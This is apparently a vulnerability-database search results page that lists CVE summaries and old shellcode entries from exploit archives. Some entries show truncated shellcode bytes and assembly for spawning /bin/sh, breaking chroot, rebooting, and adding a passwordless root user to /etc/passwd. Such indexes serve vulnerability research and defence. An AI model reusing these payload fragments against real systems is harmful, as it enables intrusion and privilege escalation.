Lucene search
+L

892 matches found

NVD
NVD
added 2005/01/10 5:0 a.m.19 views

CVE-2004-1287

Buffer overflow in the error function in preproc.c for NASM 0.98.38 1.2 allows attackers to execute arbitrary code via a crafted asm file, a different vulnerability than CVE-2005-1194...

10CVSS7.4AI score0.17882EPSS
SaveExploits1References4
OSV
OSV
added 2005/01/10 5:0 a.m.4 views

DEBIAN-CVE-2004-1287

Buffer overflow in the error function in preproc.c for NASM 0.98.38 1.2 allows attackers to execute arbitrary code via a crafted asm file, a different vulnerability than CVE-2005-1194...

10CVSS8.2AI score0.17882EPSS
SaveExploits1References1
Tenable Nessus
Tenable Nessus
added 2004/09/29 12:0 a.m.38 views

Debian DSA-047-1 : kernel

The kernels used in Debian GNU/Linux 2.2 have been found to have multiple security problems. This is a list of problems based on the 2.2.19 release notes as found on http://www.linux.org.uk/ : - binfmtmisc used user pages directly - the CPIA driver had an off-by-one error in the buffer code which...

7.5CVSS5.5AI score0.02857EPSS
SaveExploits0References14
seebug.org
seebug.org
added 2004/09/26 12:0 a.m.12 views

os-x/PPC reboot 28 bytes

No description provided by source. / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does sync reboot; See ASM below. 28 Bytes. / char shellcode = "\x7c\x63\x1a\x79" "\x39\x40\x01\x70" "\x38\x0a\xfe\xb4" "\x44\xff\xff\x02" "\x60\x60\x60\x60" "\x38\x0a\xfe\xc7" "\x44\xff\xff\x02"; int main void asm"b...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/26 12:0 a.m.29 views

os-x/PPC simple write 75 bytes

os-x/PPC simple write 75 bytes. Shellcode exploit for osxppc platform / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does write; exit; See ASM below. 75 Bytes. / char shellcode = "\x7c\x63\x1a\x79\x40\x82\xff\xfd" "\x7f\xe8\x02\xa6\x39\x40\x01\x70" "\x38\x6a\xfe\x91\x38\x9f\x01\x38"...

0.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/26 12:0 a.m.37 views

solaris/x86 execve /bin/sh toupper evasion 84 bytes

solaris/x86 execve /bin/sh toupper evasion 84 bytes. Shellcode exploit for solarisx86 platform / Solaris/x86 Used for toupper evasion look to the linux version for an explanation and usage example. / char c0de = / main: / "\xeb\x33" / jmp callz / / start: / "\x5e" / popl %esi / "\x8d\x06" / leal...

0.4AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/26 12:0 a.m.24 views

linux/x86 ipchains -F 49 bytes

No description provided by source. include stdio.h include string.h / asm" sub $0x4,%esp Con esto conseguimos que la shellcode nunca se popl %esp sobreescriba... gracias RaiSe : xorl %edx,%edx %edx a cero pushl %edx y ponemos los zeros del final del string en memoria pushw $0x462d tenemos -F0000...

7.1AI score
SaveExploits0
0day.today
0day.today
added 2004/09/26 12:0 a.m.19 views

os-x/PPC simple write() 75 bytes

Exploit for os-x/ppc platform in category shellcode ================================ os-x/PPC simple write 75 bytes ================================ / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does write; exit; See ASM below. 75 Bytes. / char shellcode = "\x7c\x63\x1a\x79\x40\x82\xff\xfd"...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/26 12:0 a.m.29 views

freebsd/x86 - execve /tmp/sh 34 bytes

freebsd/x86 execve /tmp/sh 34 bytes. Shellcode exploit for freebsdx86 platform / FreeBSD shellcode - execve /tmp/sh Claes M. Nyberg 20020120 , / / void main asm" xorl %eax, %eax eax = 0 pushl %eax string ends with NULL pushl $0x68732f2f push 'hs//' //sh pushl $0x706d742f push 'pmt/' /tmp movl %es...

0.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/26 12:0 a.m.16 views

freebsd/x86 execve /tmp/sh 34 bytes

No description provided by source. / FreeBSD shellcode - execve /tmp/sh Claes M. Nyberg 20020120 [email protected], [email protected] / / void main asm" xorl %eax, %eax eax = 0 pushl %eax string ends with NULL pushl $0x68732f2f push 'hs//' //sh pushl $0x706d742f push 'pmt/' /tmp movl %esp...

7.1AI score
SaveExploits0
0day.today
0day.today
added 2004/09/26 12:0 a.m.15 views

freebsd/x86 execve /tmp/sh 34 bytes

Exploit for freebsd/x86 platform in category shellcode =================================== freebsd/x86 execve /tmp/sh 34 bytes =================================== / FreeBSD shellcode - execve /tmp/sh Claes M. Nyberg 20020120 , / / void main asm" xorl %eax, %eax eax = 0 pushl %eax string ends with...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.16 views

linux/x86 break chroot execve /bin/sh 80 bytes

No description provided by source. / This is Linux chroot/execve code.It is 80 bytes long.I have some ideas how to make it smaller, but till then use this one. signed predator linux registered user : 181116 preedatoratsendmaildotru / char...

7.1AI score
SaveExploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.20 views

linux/x86 break chroot execve /bin/sh 80 bytes

Exploit for linux/x86 platform in category shellcode ============================================== linux/x86 break chroot execve /bin/sh 80 bytes ============================================== / This is Linux chroot/execve code.It is 80 bytes long.I have some ideas how to make it smaller, but ti...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.20 views

linux/x86 add user t00r 82 bytes

linux/x86 add user t00r 82 bytes. Shellcode exploit for linx86 platform / [email protected] 0x14abril0x7d2 82 bytes Agrega la linea "t00r::0:0::/:/bin/sh" en /etc/passwd Encriptada en http://www.shellcode.com.ar/linux/lnx-t00r-cr1.c / include // Shellcode // Asm Code char shellcode=...

7.4AI score
SaveExploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.22 views

linux/x86 execve /bin/sh 30 bytes

Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 30 bytes ================================= / email protected 20 de marzo de 2001 "\x31\xdb" // xorl %ebx,%ebx "\x8d\x43\x17" // leal 0x17%ebx,%eax "\xcd\x80" // int $0x80 "\x31\xd2" //...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.15 views

linux/x86 break chroot 46 bytes

No description provided by source. / The setuid0+chroot shellcode it will put '../' 10 times Size 46 bytes OS BSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme main: pop esi mov edi,esi xor ecx,ecx push ecx mov al,0x17 push eax int 0x80 xor eax,eax push eax mov...

7.1AI score
SaveExploits0
securityvulns
securityvulns
added 2004/07/19 12:0 a.m.67 views

[FMADV] Format String Bug in OllyDbg 1.10

FMADV - OllyDbg Format String Bug Introduction: There exists a format string bug in the code that handles Debugger Messages in OllyDbg. This means any traced application can crash OllyDbg and execute machine code. About From the Webpage: OllyDbg is a 32-bit assembler level analysing debugger for...

7AI score
SaveExploits0
exploitpack
exploitpack
added 2004/06/25 12:0 a.m.11 views

Linux Kernel 2.4.x2.6.x - Assembler Inline Function Local Denial of Service

Linux Kernel 2.4.x2.6.x - Assembler Inline Function Local Denial of Service / ----------------------------------------------------------------------------- frstor Local Kernel exploit Crashes any kernel from 2.4.18 to 2.6.7 because frstor in assembler inline offsets in memory by 4. Original proof...

0.2AI score
SaveExploits0
Exploit DB
Exploit DB
added 2003/10/09 12:0 a.m.35 views

Microsoft Windows - DCOM RPC2 Universal Shellcode

MS Windows DCOM RPC2 Universal Shellcode. Shellcode exploit for win32 platform ; Segment type: Pure code ;seg000 segment byte public 'CODE' use32 ; assume cs:seg000 ; assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing .386 assume cs:seg000 var29C = byte ptr -29Ch var28C = byte ptr...

0.4AI score
SaveExploits0
CVE
CVE
added 2003/03/18 5:0 a.m.100 views

CVE-2003-0085

Samba vulnerability CVE-2003-0085 is a remote, unauthenticated buffer overflow in the SMB/CIFS packet fragment re-assembly code used by smbd, affecting Samba prior to 2.2.8 and Samba-TNG prior to 0.3.1. An attacker could remotely execute arbitrary code (often with root privileges) by sending craf...

10CVSS7.5AI score0.87923EPSS
SaveExploits6References17Affected Software1
Rows per page
Query Builder